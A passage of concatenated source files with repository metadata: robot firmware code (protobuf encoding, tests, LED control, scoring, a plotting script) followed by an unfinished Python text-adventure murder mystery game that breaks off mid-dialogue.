(topic_metadata_t*)topic->metadata;\n size_t offset;\n size_t max_len;\n\n TopicHeader header;\n MessageSize header_size;\n\n /* First populate information in the header */\n strncpy(header.name, topic->name, sizeof(header.name) - 1);\n header.msgid = metadata->msgid;\n\n /* Then encode header, skipping enough bytes to store the message size before. */\n pb_ostream_t stream;\n offset = MessageSize_size;\n max_len = buf_len - MessageSize_size;\n if (buf_len < MessageSize_size) {\n return 0;\n }\n\n offset = MessageSize_size;\n stream = pb_ostream_from_buffer(&buf[offset], max_len);\n\n if (!pb_encode(&stream, TopicHeader_fields, &header)) {\n return 0;\n }\n\n /* Then prepend the header length message */\n header_size.bytes = stream.bytes_written;\n stream = pb_ostream_from_buffer(buf, MessageSize_size);\n\n if (!pb_encode(&stream, MessageSize_fields, &header_size)) {\n return 0;\n }\n\n return MessageSize_size + header_size.bytes;\n}\n\nstatic size_t encode_topic_body(messagebus_topic_t* topic,\n uint8_t* buf,\n size_t buf_len,\n uint8_t* scratch,\n size_t scratch_len)\n{\n pb_ostream_t stream;\n MessageSize msg_size;\n bool was_posted_once;\n topic_metadata_t* metadata = (topic_metadata_t*)topic->metadata;\n\n if (scratch_len < topic->buffer_len) {\n return 0;\n }\n\n if (buf_len < MessageSize_size) {\n return 0;\n }\n\n was_posted_once = messagebus_topic_read(topic, scratch, scratch_len);\n if (!was_posted_once) {\n return 0;\n }\n\n /* Encode while leaving enough room to write the message length */\n stream = pb_ostream_from_buffer(&buf[MessageSize_size], buf_len - MessageSize_size);\n if (!pb_encode(&stream, metadata->fields, scratch)) {\n return 0;\n }\n\n /* Prepend the encoded topic len. */\n msg_size.bytes = stream.bytes_written;\n stream = pb_ostream_from_buffer(buf, MessageSize_size);\n if (!pb_encode(&stream, MessageSize_fields, &msg_size)) {\n return 0;\n }\n\n return msg_size.bytes + MessageSize_size;\n}\n"
},
{
"alpha_fraction": 0.6314433217048645,
"alphanum_fraction": 0.6688144207000732,
"avg_line_length": 23.25,
"blob_id": "54e96eb9e8ef6a503eef13a4b798859301fbeb44",
"content_id": "c332cce88d28d02bc95d8ebdd60d66d41adb6ad5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 776,
"license_type": "permissive",
"max_line_length": 108,
"num_lines": 32,
"path": "/master-firmware/tests/test_base_helpers.cpp",
"repo_name": "SnaKyEyeS/robot-software",
"src_encoding": "UTF-8",
"text": "#include <CppUTest/TestHarness.h>\n\nextern \"C\" {\n#include <base/base_helpers.h>\n}\n\nTEST_GROUP (ABasePositionGetter) {\n const int ARBITRARY_TRACK_LENGTH_MM = 100;\n const int ARBITRARY_ENCODER_TICKS_PER_MM = 10000;\n struct robot_position robot_pos;\n\n void setup() override\n {\n position_init(&robot_pos);\n position_set_physical_params(&robot_pos, ARBITRARY_TRACK_LENGTH_MM, ARBITRARY_ENCODER_TICKS_PER_MM);\n }\n\n void teardown() override\n {\n }\n};\n\nTEST(ABasePositionGetter, returnsPoseOfRobot)\n{\n position_set(&robot_pos, 10, 10, 180);\n\n se2_t pose = base_get_robot_pose(&robot_pos);\n\n DOUBLES_EQUAL(pose.translation.x, 10, 0.1);\n DOUBLES_EQUAL(pose.translation.y, 10, 0.1);\n DOUBLES_EQUAL(pose.rotation.angle, 3.14, 0.1);\n}\n"
},
{
"alpha_fraction": 0.5086782574653625,
"alphanum_fraction": 0.5402759313583374,
"avg_line_length": 24.247190475463867,
"blob_id": "6244b42c0bfeadfe5309f2a5c6509be5ff9c0eef",
"content_id": "6e681051867c77cbe7b05ccbc00cfa39026679f4",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2247,
"license_type": "permissive",
"max_line_length": 87,
"num_lines": 89,
"path": "/tools/plot_demo.py",
"repo_name": "SnaKyEyeS/robot-software",
"src_encoding": "UTF-8",
"text": "import matplotlib\n\nmatplotlib.use(\"Agg\")\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nTABLE_SIZE = {\"x\": 3000, \"y\": 2000}\nROBOT_SIZE = 245\nARM_LENGTHS = (100, 98)\nARM_OFFSET = {\"x\": -100, \"y\": 0, \"a\": np.pi}\n\n\ndef discrete_circle(center, radius, samples, offset=0):\n return (\n [\n center[0] + radius * np.cos(2 * np.pi * i / samples + offset)\n for i in range(samples)\n ],\n [\n center[1] + radius * np.sin(2 * np.pi * i / samples + offset)\n for i in range(samples)\n ],\n )\n\n\ndef rectangle(a, b):\n return [a[0], b[0], b[0], a[0]], [a[1], a[1], b[1], b[1]]\n\n\ndef rot(angle):\n return np.array([[np.cos(angle), -np.sin(angle)], [np.sin(angle), np.cos(angle)]])\n\n\ndef lever(length, angle):\n return length * np.array([np.cos(angle), np.sin(angle)])\n\n\ndef draw_link(ax, x0, x1, thickness=5):\n ax.plot([x0[0], x1[0]], [x0[1], x1[1]], linewidth=thickness)\n\n\ndef draw_polygon(ax, polygon, fill=True):\n x, y = polygon\n x.append(x[0])\n y.append(y[0])\n if fill:\n ax.fill(x, y)\n else:\n ax.plot(x, y)\n\n\ndef draw_base(ax, pose, robot_size):\n draw_polygon(\n ax, discrete_circle((pose[\"x\"], pose[\"y\"]), robot_size / 2, 6, pose[\"a\"])\n )\n\n\ndef draw_arm(ax, pose, arm, arm_offset):\n shoulder = np.array([pose[\"x\"], pose[\"y\"]]) + rot(pose[\"a\"]) @ [\n arm_offset[\"x\"],\n arm_offset[\"y\"],\n ]\n elbow = shoulder + lever(ARM_LENGTHS[0], pose[\"a\"] + arm_offset[\"a\"] + arm[\"a\"])\n hand = elbow + lever(\n ARM_LENGTHS[1], pose[\"a\"] + arm_offset[\"a\"] + arm[\"a\"] + arm[\"b\"]\n )\n\n draw_link(ax, shoulder, elbow)\n draw_link(ax, elbow, hand)\n\n\ndef draw_robot(ax, pose={\"x\": 0, \"y\": 0, \"a\": 0}, arm={\"a\": 0, \"b\": 0}):\n draw_base(ax, pose, ROBOT_SIZE)\n draw_arm(ax, pose, arm, ARM_OFFSET)\n\n\ndef draw_table(margin=200):\n fig, ax = plt.subplots()\n ax.set_xlim((-margin, TABLE_SIZE[\"x\"] + margin))\n ax.set_ylim((-margin, TABLE_SIZE[\"y\"] + margin))\n draw_polygon(ax, rectangle((0, 0), (TABLE_SIZE[\"x\"], TABLE_SIZE[\"y\"])), fill=False)\n return fig, ax\n\n\nfig, ax = draw_table()\ndraw_robot(\n ax, {\"x\": 1000, \"y\": 1000, \"a\": np.pi / 2}, {\"a\": np.pi / 4, \"b\": -np.pi / 2}\n)\nfig.savefig(\"test.png\")\n"
},
{
"alpha_fraction": 0.5926605463027954,
"alphanum_fraction": 0.6091743111610413,
"avg_line_length": 18.81818199157715,
"blob_id": "1b2fc5bc97578a1d6b73b0330c5c8910b3992c55",
"content_id": "c445b4b62111b7e25a30b0acd516357efde84385",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1090,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 55,
"path": "/master-firmware/src/strategy/score.cpp",
"repo_name": "SnaKyEyeS/robot-software",
"src_encoding": "UTF-8",
"text": "#include \"score.h\"\n\nstatic int compute_windsocks(const StrategyState& state)\n{\n if (state.windsocks_are_up[0] && state.windsocks_are_up[1]) {\n return 15;\n }\n\n if (state.windsocks_are_up[0] || state.windsocks_are_up[1]) {\n return 5;\n }\n\n return 0;\n}\n\nstatic int compute_lighthouse(const StrategyState& state, bool is_main_robot)\n{\n int score = 0;\n\n /* We get +2 points for the team for having the lighthouse, but only one\n * robot should account for it. */\n if (is_main_robot) {\n score += 2;\n }\n\n if (state.lighthouse_is_on) {\n score += 13;\n }\n\n return score;\n}\n\nstatic int compute_flags(const StrategyState& state, bool is_main_robot)\n{\n if (!is_main_robot) {\n return 0;\n }\n\n if (state.robot.flags_deployed) {\n return 10;\n }\n\n return 0;\n}\n\nint compute_score(const StrategyState& state, bool is_main_robot)\n{\n int score = 0;\n\n score += compute_windsocks(state);\n score += compute_lighthouse(state, is_main_robot);\n score += compute_flags(state, is_main_robot);\n\n return score;\n}\n"
},
{
"alpha_fraction": 0.6867815852165222,
"alphanum_fraction": 0.6910919547080994,
"avg_line_length": 30.636363983154297,
"blob_id": "e8375e5ca2efaf0e5ddf8aed4441288771a5ca1e",
"content_id": "39d4335838d24d16fe4903bfaecd6d72952add9a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 696,
"license_type": "permissive",
"max_line_length": 95,
"num_lines": 22,
"path": "/eurobot/arm-simulator/setup.py",
"repo_name": "SnaKyEyeS/robot-software",
"src_encoding": "UTF-8",
"text": "from setuptools import setup, find_packages\n\n# read the contents of the README\nfrom os import path\n\nthis_directory = path.abspath(path.dirname(__file__))\nwith open(path.join(this_directory, \"README.md\"), encoding=\"utf-8\") as f:\n long_description = f.read()\n\nsetup(\n name=\"arm_simulator\",\n version=0.1,\n description=\"Simulating robot arms using Hamiltonian dynamics & automatic differentiation\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n author=\"Club Vaudois de Robotique Autonome\",\n author_email=\"[email protected]\",\n url=\"http://cvra.ch\",\n license=\"BSD\",\n packages=find_packages(exclude=[\"contrib\", \"docs\", \"tests*\"]),\n install_requires=[\"autograd\",],\n)\n"
},
{
"alpha_fraction": 0.6642027497291565,
"alphanum_fraction": 0.6684266328811646,
"avg_line_length": 21.547618865966797,
"blob_id": "41e85bfcfaac72c2cc74579f6d8962eae6f53c73",
"content_id": "2060442f2b36074e2fab56777b5521bc06890f8f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 947,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 42,
"path": "/master-firmware/src/gui.cpp",
"repo_name": "SnaKyEyeS/robot-software",
"src_encoding": "UTF-8",
"text": "#include <thread>\n#include \"gui.h\"\n#include <string.h>\n#include <stdio.h>\n#include <gfx.h>\n#include \"gui/Menu.h\"\n#include \"gui/PositionPage.h\"\n#include \"gui/MovePage.h\"\n#include \"gui/MenuPage.h\"\n#include \"gui/ScorePage.h\"\n\nstatic void gui_thread()\n{\n gfxInit();\n gwinSetDefaultStyle(&WhiteWidgetStyle, GFXOFF);\n gwinSetDefaultFont(gdispOpenFont(\"DejaVuSans32\"));\n gdispClear(GFX_SILVER);\n gwinSetDefaultBgColor(GFX_SILVER);\n gdispSetOrientation(gOrientation90);\n\n WARNING(\"GUI init done\");\n\n Menu m;\n PositionPage base_position_page;\n MovePage base_move_page;\n ScorePage score_page;\n auto base_menu = MenuPage(m, \"Base\", &base_position_page, &base_move_page);\n auto root_page = MenuPage(m, \"Robot\", &base_menu, &score_page);\n\n m.enter_page(&root_page);\n m.enter_page(&score_page);\n m.event_loop();\n\n while (true) {\n }\n}\n\nvoid gui_start()\n{\n std::thread thd(gui_thread);\n thd.detach();\n}\n"
},
{
"alpha_fraction": 0.6490283012390137,
"alphanum_fraction": 0.6513696908950806,
"avg_line_length": 29.949275970458984,
"blob_id": "264c07c90937f6f3d3e1d3fbc4d9ac33f92a1473",
"content_id": "ae23703b4942d27027c822d811217237762dd39e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 4271,
"license_type": "permissive",
"max_line_length": 109,
"num_lines": 138,
"path": "/master-firmware/src/control_panel.cpp",
"repo_name": "SnaKyEyeS/robot-software",
"src_encoding": "UTF-8",
"text": "#include <absl/flags/flag.h>\n#include <error/error.h>\n#include \"control_panel.h\"\n#include <unordered_map>\n#include <string>\n#include <cstdio>\n#include <cerrno>\n\nABSL_FLAG(std::string, led_ready_path, \"/sys/class/leds/ready\", \"Path in sysfs used to control LED_READY.\");\nABSL_FLAG(std::string, led_debug_path, \"/sys/class/leds/debug\", \"Path in sysfs used to control LED_DEBUG.\");\nABSL_FLAG(std::string, led_error_path, \"/sys/class/leds/error\", \"Path in sysfs used to control LED_ERROR.\");\nABSL_FLAG(std::string, led_power_path, \"/sys/class/leds/power\", \"Path in sysfs used to control LED_POWER.\");\nABSL_FLAG(std::string, led_pc_path, \"/sys/class/leds/pc\", \"Path in sysfs used to control LED_PC.\");\nABSL_FLAG(std::string, led_bus_path, \"/sys/class/leds/bus\", \"Path in sysfs used to control LED_BUS.\");\n// TODO: Support for RGB led\n\nstruct LedInfo {\n FILE* brightness_file = nullptr;\n int max_brightness = 0;\n bool out_status = false;\n};\n\nstd::unordered_map<enum control_panel_output, LedInfo> led_infos;\n\nconst char* control_panel_input[] = {\n \"BUTTON_YELLOW\",\n \"BUTTON_GREEN\",\n \"STARTER\",\n};\n\nconst char* control_panel_output[] = {\n \"LED_READY\",\n \"LED_DEBUG\",\n \"LED_ERROR\",\n \"LED_POWER\",\n \"LED_PC\",\n \"LED_BUS\",\n \"LED_YELLOW\",\n \"LED_GREEN\",\n};\n\nstatic void set_output(enum control_panel_output out, bool value)\n{\n auto led_info = led_infos.find(out);\n\n DEBUG(\"seting %s to %d\", control_panel_output[out], value);\n\n if (led_info == led_infos.end()) {\n WARNING(\"can not set output %s\", control_panel_output[out]);\n return;\n }\n\n std::string msg = std::to_string(value * led_info->second.max_brightness);\n fwrite(msg.c_str(), msg.length(), 1, led_info->second.brightness_file);\n fflush(led_info->second.brightness_file);\n DEBUG(\"writing '%s' to out %d\", msg.c_str(), out);\n\n led_info->second.out_status = value;\n}\n\nstatic void open_led(enum control_panel_output led_num, std::string path)\n{\n FILE* f;\n LedInfo led_info;\n\n DEBUG(\"output %d is at %s\", led_num, path.c_str());\n\n // First, get the maximum brightness level for this LED\n std::string max_brightness_path = path + \"/max_brightness\";\n f = fopen(max_brightness_path.c_str(), \"r\");\n if (f == nullptr) {\n WARNING(\"could not open '%s' for led %d: %s\", max_brightness_path.c_str(), led_num, strerror(errno));\n return;\n }\n\n fscanf(f, \"%d\", &led_info.max_brightness);\n\n // Then, open the control file for this LED\n std::string brightness_path = path + \"/brightness\";\n led_info.brightness_file = fopen(brightness_path.c_str(), \"w\");\n\n if (led_info.brightness_file == nullptr) {\n WARNING(\"could not open '%s' for led %d: %s\", brightness_path.c_str(), led_num, strerror(errno));\n return;\n }\n\n // keep the file descriptor cached around\n led_infos[led_num] = led_info;\n\n // Turn off all LEDs by default\n set_output(led_num, false);\n\n DEBUG(\"opened %s succesfully\", control_panel_output[led_num]);\n}\n\nvoid control_panel_init(bool is_active_high)\n{\n (void)is_active_high;\n open_led(LED_READY, absl::GetFlag(FLAGS_led_ready_path));\n open_led(LED_DEBUG, absl::GetFlag(FLAGS_led_debug_path));\n open_led(LED_ERROR, absl::GetFlag(FLAGS_led_error_path));\n open_led(LED_POWER, absl::GetFlag(FLAGS_led_power_path));\n open_led(LED_PC, absl::GetFlag(FLAGS_led_pc_path));\n open_led(LED_BUS, absl::GetFlag(FLAGS_led_bus_path));\n}\n\nbool control_panel_read(enum control_panel_input in)\n{\n WARNING_EVERY_N(100, \"%s(%s) not implemented yet.\", __FUNCTION__, control_panel_input[in]);\n return false;\n}\n\nbool control_panel_button_is_pressed(enum control_panel_input in)\n{\n WARNING_EVERY_N(100, \"%s(%s) not implemented yet.\", __FUNCTION__, control_panel_input[in]);\n return false;\n}\n\nvoid control_panel_set(enum control_panel_output out)\n{\n set_output(out, true);\n}\n\nvoid control_panel_clear(enum control_panel_output out)\n{\n set_output(out, false);\n}\n\nvoid control_panel_toggle(enum control_panel_output out)\n{\n auto led = led_infos.find(out);\n if (led == led_infos.end()) {\n WARNING_EVERY_N(10, \"could not read back state for %s\", control_panel_output[out]);\n return;\n }\n\n set_output(out, !led->second.out_status);\n}\n"
},
{
"alpha_fraction": 0.5260977745056152,
"alphanum_fraction": 0.5708367824554443,
"avg_line_length": 22.211538314819336,
"blob_id": "19bb0078c8c71058be62c474682fe54e8ac236a9",
"content_id": "47614e018363936237c5d1901f179629cb904a0b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 1207,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 52,
"path": "/master-firmware/src/unix_timestamp.c",
"repo_name": "SnaKyEyeS/robot-software",
"src_encoding": "UTF-8",
"text": "#include <error/error.h>\n#include \"unix_timestamp.h\"\n\nstatic unix_timestamp_t unix_reference = {.s = 0, .us = 0};\nstatic int32_t local_reference = 0;\n\nint32_t timestamp_unix_to_local_us(unix_timestamp_t ts)\n{\n ts.s -= unix_reference.s;\n ts.us -= unix_reference.us;\n return ts.s * 1000000 + ts.us + local_reference;\n}\n\nunix_timestamp_t timestamp_local_us_to_unix(int32_t ts)\n{\n unix_timestamp_t result;\n\n ts -= local_reference;\n result.s = ts / 1000000 + unix_reference.s;\n result.us = ts % 1000000 + unix_reference.us;\n\n if (result.us >= 1000000) {\n result.s += 1;\n result.us -= 1000000;\n }\n\n return result;\n}\n\nvoid timestamp_set_reference(unix_timestamp_t unix_ts, int32_t local_ts)\n{\n DEBUG(\"NTP time update: %d is: %d.%06d\", local_ts, unix_ts.s, unix_ts.us);\n unix_reference = unix_ts;\n local_reference = local_ts;\n}\n\nint timestamp_unix_compare(unix_timestamp_t a, unix_timestamp_t b)\n{\n if (a.s < b.s) {\n return -1;\n } else if (a.s == b.s) {\n if (a.us < b.us) {\n return -1;\n } else if (a.us == b.us) {\n return 0;\n } else {\n return 1;\n }\n } else {\n return 1;\n }\n}\n"
},
{
"alpha_fraction": 0.6812499761581421,
"alphanum_fraction": 0.6812499761581421,
"avg_line_length": 10.428571701049805,
"blob_id": "f387887827dd85c37cf4734ef995d09b07047c08",
"content_id": "9063a331df1c1f4e2802e8bb7c01fc258ff56e0c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 160,
"license_type": "permissive",
"max_line_length": 26,
"num_lines": 14,
"path": "/master-firmware/src/strategy.h",
"repo_name": "SnaKyEyeS/robot-software",
"src_encoding": "UTF-8",
"text": "#ifndef STRATEGY_H\n#define STRATEGY_H\n\n#ifdef __cplusplus\nextern \"C\" {\n#endif\n\nvoid strategy_play_game();\n\n#ifdef __cplusplus\n}\n#endif\n\n#endif /* STRATEGY_H */\n"
}
] | 21 |
SumanjitGill/ChooseYourAdventureStory
|
https://github.com/SumanjitGill/ChooseYourAdventureStory
|
fb4d8619c6fd3a1be9fbab21d4f2d9054e19237b
|
cf15a56af2bccae4982a4ca0bfccccc6631311c5
|
e0a8024584e56bc8b7b961e472b7096a5f606865
|
refs/heads/master
| 2021-01-17T15:15:51.595285 | 2016-05-17T17:11:21 | 2016-05-17T17:11:21 | 53,967,748 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.634540319442749,
"alphanum_fraction": 0.6397899985313416,
"avg_line_length": 41.77735137939453,
"blob_id": "98b3cb855a3f85d2696eeb768ef03de77f20c046",
"content_id": "e6880028b5db230f61c639917c5fe94f41dd1fef",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 22301,
"license_type": "no_license",
"max_line_length": 618,
"num_lines": 521,
"path": "/CS10-SumanjitGill-ChooseYourOwnAdventure.py",
"repo_name": "SumanjitGill/ChooseYourAdventureStory",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n#WARNING: GAME UNFINISHED\n\nimport sys\nimport random\n\nclass Inventory:\n def __init__(self):\n self.inventory = []\n self.inventory_two = []\n \n #def view inventory (inventory_two)\n def view_inventory(self):\n print self.inventory_two\n #def examine item (inventory)\n def examine_item(self, obj):\n if obj not in self.inventory:\n print 'You can\\'t examine this object because it is not in your\\\n inventory. Try an object you have.'\n else:\n print obj.name\n print obj.description\n \nuser_inventory = Inventory()\n\n#-------------------------------------------------------------------------------\n \nclass Item:\n def __init__(self, name, description):\n self.name = name\n self.description = description\n \n def examine(self):\n print self.name\n print self.description\n \n def pick_up(self, Inventory):\n Inventory.inventory.append(Item)\n Inventory.inventory_two.append(self.name)\n print 'You have picked up: %s.' %self.name\n \n def give_item(self):\n Inventory.inventory.remove(Item)\n Inventory.inventory_two.remove(self.name)\n\ncell_phone = Item('Nicole\\'s Cell Phone', 'There is a passcode on this phone but\\\nthere must be some good evidence on here; Why not take it to Gabi?')\n\nteacup = Item('Teacup', 'This broken cup can be taken to Gabi. Nicole drinks tea\\\nevery morning... any ideas?')\n\nbody = Item('Nicole\\'s Body', 'There are no trauma signs; Could she have been killed\\\nwith poison?')\n\npaperwork = Item('Financial Paperwork', 'This paperwork lets you know that Sakshi\\\nand Nicole were business rivals.')\n\n#To be updated later\n\ntea_grounds = Item('Tea Grounds', '')\n\nmorphine_capsules = Item('Morphine Capsules', '')\n\nchair = Item('Chair', '')\n\npen = Item('Sakshi\\'s Pen', '')\n\nwater_glass = Item('Sakshi\\'s Glass', '')\n\nwater_glass_2 = Item('','')\n\nvase = Item('','')\n\nfridge = Item('','')\n\nvase_2 = Item('','')\n\npen_2 = Item('','')\n\ndesk = Item('','')\n\nwrapper = Item('','')\n\nclarinet = Item('','')\n\nbench = Item('','')\n\nnews_clipping = Item('','')\n\npill_bottle = Item('','')\n\n#-------------------------------------------------------------------------------\n\n#Storyline\nclass Character():\n def __init__(self, name, full_name, age, status, background, location):\n self.name = name\n self.full_name = full_name\n self.age = age\n self.status = status\n self.background = background\n self.location = location\n \n def stats(self):\n print self.full_name\n print self.age\n print self.status\n print self.background\n'''\n \n def locate(character):\n print character.name+ 'is located in: %s' %character.location\n '''\n \nCaroline = Character('Caroline','Karolina \"Caroline\" Ativa', 22, 'Alive', 'Caroline is a dedicated police officer and takes her tasks seriously.', 'You are her... So wherever you are that\\'s where she is.')\nLiam = Character('Liam','Liam Youngblood', 23, 'Alive', 'Liam is your fellow officer and is very charasmatic and likes to make light of situations to keep your spirits up.', 'He\\'s always by your side.')\nGabriela = Character('Gabi','Gabriella Solis',18, 'Alive', 'Gabi is a technology and science geek and loves to invent new things; she\\'s the scientific aide to your father\\'s police department.', 'She\\'s found in the lab at the police office.')\nAndres = Character('Andres','Andres Leal', 30, 'Alive; Suspect', 'Andres is a calm doctor who loves to play his clarinet.', 'He\\'s found in the garden.')\nBree = Character('Bree','Breanna \"Bree\" Scholtz', 35, 'Alive; Suspect', 'She works as Leng\\'s maid around the mansion.', 'She\\'s found in the living room.')\nNicole = Character('Nicole','Nicole Laurenya', 31, 'Dead; Victim', 'She was a rich heiress of Twilight Grove.', 'Her corpse is found in her bedroom.')\nLiev = Character('Liev','Liev Ativa', 45, 'Alive', 'He is your father and the police chief who assigned you to this investigation.', 'He is found in the police office.')\nSakshi = Character('Sakshi','Sakshi Goenka', 32, 'Alive; Suspect','Sakshi is a business tycoon and is Leng\\'s girlfriend.', 'She is found in the study.')\nLeng = Character('Leng','Leng Li', 33, 'Alive; Suspect', 'He is a renowned chef and is Sakshi\\'s lover.', 'He is found in the kitchen.')\n\n#-------------------------------------------------------------------------------\n\n#def help():\n# user_q = raw_input('What do you need help with?\\n')\n\n#-------------------------------------------------------------------------------\n \n#For Version 2: \n'''class Notebook:\n def __init__(self):\n self.notebook = []\n \n def write_in_notebook(self):\n user_note = raw_input('What would you like to write in your notebook?')\n self.notebook.append(user_note)\n \n def show_entry_amount(self):\n if len(self.notebook) ==1:\n print 'You have 1 entry.'\n elif len(self.notebook) ==0:\n print 'You don\\'t have any entries.'\n else:\n print 'You have', len(self.notebook),'entries.'\n \n def read_entry(self):\n for i in enumerate(self.notebook):\n print i\n user_entry_choice = raw_input('Which entry would you like to read?')\n try:\n path = [int(user_entry_choice)]\n print self.notebook[path]\n except:\n print 'Invalid Number. Try a valid number.'\n \nyour_notebook = Notebook()\n#4691 E Harvard Ave Fresno, CA 93703-2075\n'''\n\n#-------------------------------------------------------------------------------\n\n#class Dialogue:\n # def __init__(self, dialogue):\n # self.dialogue = dialogue\n # \n #def say(self,char):\n # print char.name+':','\"'+self.dialogue+'\"'\n \nscene_1 = 'Chief: Chief Ativa speaking. Yes, sir. Yes, sir. I understand. Yes, sir, I will make sure it is taken care of.\\n\\\nThe Chief hangs up the phone and looks at a picture with him and his daughter (you) on the day she (you) graduated from the police academy.\\n\\\nYou are sitting outside at your desk with paperwork, you partner Liam talking your ear off.\\n\\\nLiam: And that\\'s when I said, I don\\'t care how much money he has. It\\'s all about how his -- \\n\\\nChief: Ativa and Youngblood, get in here.\\n\\\nLiam: Pants. And yes, sir! Your dad seems grumpy.\\n\\\nYou: Probably saw your face too early in the morning.\\n\\\nLiam: Ouch, that hurts.\\n\\\nYou both enter the Chief\\'s office.\\n\\\nChief: There\\'s been a highly suspicious death.\\n\\\nLiam: Naturally, we are the homicide division.\\n\\\nYou shoot Liam a look, fighting the urge to roll your eyes, which the Chief does do.\\n\\\nChief: Youngblood, I don\\'t want to hear another word until I am done briefing you. There\\'s been a death in Twilight Grove.\\n\\\nLiam whistles, getting another irritated look from the Chief. You know what Liam meant. Twilight Grove is a very affluent neighborhood.\\n\\\nChief: As you can understand, it\\'s a high profile case and the Mayor is concerned. The crime scene is quite isolated so it has been kept quiet. \\n\\\nI want both of you to head the case and wrap it up. Come talk to me as soon as you\\'ve solved it.\\n\\\nYou exit the Chief\\'s office with Liam. What would you like to do:\\n\\\n\t- police office\\n\\\n\t- mansion\\n\\\n\t- lab'\n\nchief = '\\nChief: What are you waiting for? Finish up the case!'\n\ngabi = '\\nGabi: No evidence, no entry, no Gabi. Come back later you lovable bozos.'\n\nscene_2 = '\\nLiam: That is one huge—\\n\\\nYou: According to the case files, it belongs to a guy named Leng Li. He\\'s a renowned chef.\\n\\\nLiam: If he\\'s so rich, why can\\'t he buy a trash can? There\\'s so much junk around here.\\n\\\nYou: Oh, right, the garbage strike. Did you read about how -- \\n\\\nLiam: No, I didn\\'t. Well, I can take solace in the fact that my house is cleaner than a rich guy\\'s. \\n\\\nYou: And there\\'s no dead body in yours. I hope.'\n\nscene_3 = '\\nLiam: Pretty girl. At least she didn\\'t die in the \"living\" room, eh?\\n\\\nYou: This is Nicole Laurenya, a rich heiress well-known for her social life.\\n\\\nLiam: Just going to ignore my joke?\\n\\\nYou: Yup.'\n\nexamine = '\\nYou: I don\\'t see any signs of trauma and I hardly think it\\'s natural causes. It could be poison…\\n\\\nLiam: The killer\\'s probably a woman then. Poison is usually used by women.\\n\\\nYou: Didn\\'t you say you would kill someone with cyanide if you wanted to make a clean getaway?\\n\\\nLiam: I\\'m special. Anyways, let\\'s let the coroner take a look. Gabriella will tell us more.'\n\ncup = '\\nYou: Gabriella can also tell us more about this.\\n\\\nLiam: Now I\\'m thirsty.\\n\\\nYou: You want a sip?\\n\\\nLiam: Ha, ha, hilarious.'\n\nphone = 'You: Found something.\\n\\\nLiam: The victim\\'s cell phone. Nice.\\n\\\nYou: It has a passcode but I\\'m sure we can figure it out later.'\n\nsakshi_1 = 'You enter the study to see a woman sitting at the desk and writing with a fancy pen, her expression clearly upset. \\n\\\nYou: Hello. I am Detective Ativa and this is my partner, Detective Youngblood. We need to ask you some questions. What is your name?\\n\\\nSakshi: I\\'m Sakshi Goenka.\\n\\\nLiam: The business tycoon?\\n\\\nSakshi: The very same.\\n\\\nLiam: And how were you related to the victim?\\n\\\nSakshi: Her name was Nicole. You can at least say her name. And she was my best friend. \\n\\\nYou: I\\'m so sorry for your loss. Can you tell us what happened?\\n\\\nSakshi: I don’t know. My boyfriend, Leng, invited our friends over for a few days so we can spend some time together and…all I know is Nicole was alive last night and this morning, when she didn\\'t come down for breakfast, the maid went to check on her and she was dead. Just like that. She shouldn\\'t be. Nicole was the sweetest, funniest, most fun person you could know.\\n\\\nYou: Thank you for your time. We\\'ll be back later if we have more questions.'\n\nleng_1 = '\\nYou enter the kitchen to see a man pouring himself a glass of water, looking lost.\\n\\\nYou: Hello. I am Detective Ativa and this is my partner, Detective Youngblood. We need to ask you some questions. What is your name?\\n\\\nLeng: My name is Leng, Leng Li. \\n\\\nLiam: And how were you related to the victim?\\n\\\nLeng: Nicole is, was, one of my best friends. She, my girlfriend Sakshi, Andres, and I grew up together.\\n\\\nYou: I\\'m so sorry for your loss. Can you tell us what happened?\\n\\\nLeng: All of us finally had some time off and so I invited everyone to stay for a few days. I was looking forward to it. I can\\'t believe the nightmare it has become. Everything was so normal and nostalgic. Nicole was having a blast the entire time, we all were. This morning…we all came for breakfast but Nicole wasn\\'t there. I told Bree, my maid, to call her. She screamed so loud and we all ran up there and saw…she was dead. I still can\\'t believe she\\'s really gone.\\n\\\nYou: Thank you for your time. We\\'ll be back later if we have more questions.'\n\nbree_1 = '\\nYou enter the living room to see a woman nervously arranging a vase of flowers, her face disturbed.\\n\\\nYou: Hello. I am Detective Ativa and this is my partner, Detective Youngblood. We need to ask you some questions. What is your name?\\n\\\nBree: My name is Bree Scholtz.\\n\\\nLiam: And how were you related to the victim?\\n\\\nBree: I\\'m not. I mean, I\\'m Mr. Li\\'s maid so I only knew Ms. Nicole in passing.\\n\\\nYou: I understand. Can you tell us what happened? You found the body, correct?\\n\\\nBree: Yes, it was horrible. Last night, Ms. Nicole had asked me to bring her a cup of the special blend that Mr. Li had set aside for her in the morning at precisely 8 a.m. Unfortunately, I didn\\'t get up there until about 8:30 a.m. and Ms. Nicole was in the shower. I helped Mr. Li in the kitchen until breakfast was to be served. Mr. Li sent me upstairs when Ms. Nicole didn\\'t come down. I went to her room and opened the door to see her lying on the ground, completely still. I screamed and they all came running up. I don\\'t remember who said she was dead; I was in shock. It was a truly horrifying experience.\\n\\\nLiam: So you were also the last person to see the victim alive?\\n\\\nBree: I suppose so. Ms. Nicole was in the shower when I went there so I never saw her exactly.\\n\\\nYou: Thank you for your time. We\\'ll be back later if we have more questions.'\n\nandres_1 = '\\nYou enter the garden to see 